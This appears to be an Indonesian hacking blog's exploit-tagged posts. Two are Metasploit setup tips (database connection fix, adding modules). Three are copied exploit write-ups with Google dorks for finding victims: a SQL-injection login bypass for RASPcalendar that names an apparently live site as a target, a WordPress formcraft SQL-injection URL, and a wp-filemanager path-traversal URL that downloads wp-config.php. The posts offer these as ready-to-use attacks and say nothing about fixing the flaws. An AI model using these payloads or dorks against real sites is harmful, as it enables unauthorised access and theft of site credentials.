Tampilkan postingan dengan label exploit. Tampilkan semua postingan
Tampilkan postingan dengan label exploit. Tampilkan semua postingan

Senin, 02 Juni 2014

Fixed Failed to Connect to the Database Metasploit

Mungkin dari beberapa orang yg baru belajar Metasploit, pernah ngalamain error database metasploit seperti ini
Failed to connect to the database: could not connect to server: connection refused


Udah Jelas banget dari Pesan nya, Database nya gak connected :)

Ok, Bgini cara Fix nya
1. Pastikan service postgresql, kalian berjalan
2. cek file config database metasploit nya ( /opt/metasploit-4.4.0/config/database.yml )


Jalankan Service Postgresql nya.
$ service postgresql start

Masih ada error ??
bisa jadi itu karna masalah config dengan dengan database msf kalian,
dan ini cara untuk setup new database msf dengan postgresql

Root@Ganteng:# su - postgres
postgres@localhost~$ createuser [Nama User] -P
postgres@localhost~$ [Enter password]
postgres@localhost~$ Validate password
postgres@localhost~$ Shall the new role be a superuser? n
postgres@localhost~$ Shall the new role be allowed to create databases? n
postgres@localhost~$ Shall the new role be allowed to create new roles? n
postgres@localhost~$ createdb --owner=[Nama User] [Name_Database]
postgres@localhost~$ exit

setelah membuat user di posgresql
next kita membuat file configure database Metasploiut nya.
kalian bisa liat contoh file nya di
"/usr/share/metasploit-framework/config/database.yml.example"

edit aja langsung itu file example nya..


Input data-data nya sesuai yg tadi dibuat di postgresql
Kemudia save

dan rename dari "database.yml.example" to "database.yml"



Ok,Next... Buka msfconsole



Jika masih belum connect,coba dengan meng'connectkan langsung di Metasploit nya
msf > db_connect NamaUser:Passwd@127.0.0.1:5432/name_database



Done..
Share:

Rabu, 01 Januari 2014

Menambahkan Metasploit Modules




siapa yang tidak kenal metasploit..
tool satu ini sangat berguna banget di dunia security untuk melakukan Pentesting

di dalem metasploit ini,terdapat banyak sekali exploit-exploit yang bisa dibilang cukup mantap.
tapi bagaimana kalo version metasploit kita tidak update
atau kita ingin menambahkan module exploit buatan kita sendiri


oke,. pertama siapkan dulu module exploit yang ingin ditambahkan ke metasploit

kalian bisa download module disini
atau bikinan sendiri :p


bikin folder/directory pada  /root/.msf4/modules/



taruh disini Modules msf kalian
/root/.msf4/modules/exploit/tambahan/
**hanya saran

oke next,buka msfconsole
ketikan "reload_all"  pada msfconsole kalian
guna untuk me'refresh module-module msf kalian :D


jika sudah semua..,sekarang waktu nya untuk mencoba





oke..kita selasi :)
tak lupa saya mengucapkan "Selamat Tahun Baru 2014"
sampai ketemu di Postingan Selanjut nya


Share:

Selasa, 31 Desember 2013

RASPcalendar 1.01 Admin Login Vulnerabilities

Author          :  Hackeri-AL
Date              : 06-11-2013
Vendor Homepage : http://www.rttucson.com/files.html
Software link   : http://www.rttucson.com/RASPcalendar.zip
Verison         : 1.01
Verified        : Yes
==========================================================

Google Dork :
"powered by RASPcalendar"
allinurl:RASPcalendar


Example
http://sharynstutoring.com/Calendar/

Go to ==>   http://sharynstutoring.com/Calendar/admin/


UserName : 1'or'1
PassWord : 1'or'1

Login Success Fully :D



Share:

Wordpress formcraft Plugin Sql Injection


Exploit Author : Ashiyane Digital Security Team
Vuln. Plat.: Web Application
Tested on.: Windows , Linux
Date.: 2013/12/2
=============================================


Google Dork : inurl:/wp-content/plugins/formcraft


Exploit : Sql Injection
 Location1 :
[Target]/wp-content/plugins/formcraft/form.php?id=[Sql]

A PoC: form.php?id=1%20and%20 1=1

tested me :D

oke sekian dari Clound tentang formcraft Plugin Wordpress


Share:

Wordpress wp-FileManager Local File Download Vulnerability

Author: ByEge
Download: http://wordpress.org/extend/plugins/wp-filemanager/
Vuln. Plat.:  Web Application
Test Platform :  Linux
==============================================


Exploit Note :
In order for this to work, the "Allow Download" setting must be checked in the FileManager's settings.

Google Dorks :
inurl:wp-content/plugins/wp-filemanager/

Test :
http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download


Oke,sekian dari Clound


Share: